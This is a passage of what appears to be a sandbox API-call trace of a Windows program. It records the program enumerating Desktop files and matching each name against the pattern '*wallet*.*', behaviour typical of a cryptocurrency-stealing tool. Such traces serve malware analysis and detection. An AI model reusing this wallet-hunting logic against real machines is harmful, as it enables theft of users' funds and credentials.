ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.814] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.814] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.814] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.814] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.814] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.814] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="OFSiahfxrlNjf.swf" | out: lpString1="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf") returned="\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf" [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2b28 [0110.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x29a2b28, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", lpUsedDefaultChar=0x0) returned 62 [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c90 [0110.815] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.815] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f20 [0110.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970f20, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.815] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0110.815] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*wallet*.*") returned 0 [0110.815] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.815] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c90 | out: hHeap=0x29a0000) returned 1 [0110.815] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.815] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.815] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.815] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.815] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.815] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.815] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2810 [0110.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x29a2810, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", lpUsedDefaultChar=0x0) returned 59 [0110.815] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.815] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.815] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.816] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ca0 [0110.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970ca0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.816] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.816] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*wallet*.*") returned 0 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.816] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.816] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.816] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.816] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.816] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.816] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.816] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.816] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.816] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2858 [0110.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x29a2858, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", lpUsedDefaultChar=0x0) returned 59 [0110.816] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.816] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ee0 [0110.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970ee0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.816] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0110.816] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*wallet*.*") returned 0 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.816] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0110.817] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.817] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0110.817] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.817] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpUsedDefaultChar=0x0) returned 44 [0110.817] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.817] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.817] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.817] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e20 [0110.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e20, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.817] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.817] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e20 | out: hHeap=0x29a0000) returned 1 [0110.817] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*wallet*.*") returned 0 [0110.817] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970448 | out: hHeap=0x29a0000) returned 1 [0110.817] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.817] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.817] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.817] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.817] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif" [0110.817] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.817] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.817] lstrcatW (in: lpString1="\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="\\PKW-syaNOG91rV.gif") returned="\\PKW-syaNOG91rV.gif" [0110.817] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.817] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea5d8 [0110.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x38ea5d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", lpUsedDefaultChar=0x0) returned 50 [0110.818] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.818] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea5d8 | out: hHeap=0x29a0000) returned 1 [0110.818] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.818] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c00 [0110.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c00, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.818] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.818] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.818] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*wallet*.*") returned 0 [0110.818] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.818] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.818] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.818] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.818] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.818] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv" [0110.818] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.818] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.818] lstrcatW (in: lpString1="\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="\\QjzdslaoFnrvJ.flv") returned="\\QjzdslaoFnrvJ.flv" [0110.820] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.820] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea418 [0110.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x38ea418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", lpUsedDefaultChar=0x0) returned 49 [0110.820] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0110.820] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea418 | out: hHeap=0x29a0000) returned 1 [0110.820] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.820] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970bc0 [0110.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970bc0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.820] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.820] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.820] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*wallet*.*") returned 0 [0110.820] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.821] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0110.821] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.821] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.821] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.821] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4" [0110.821] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.821] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.821] lstrcatW (in: lpString1="\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="\\QqfcEGsF2dGoVC.mp4") returned="\\QqfcEGsF2dGoVC.mp4" [0110.821] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 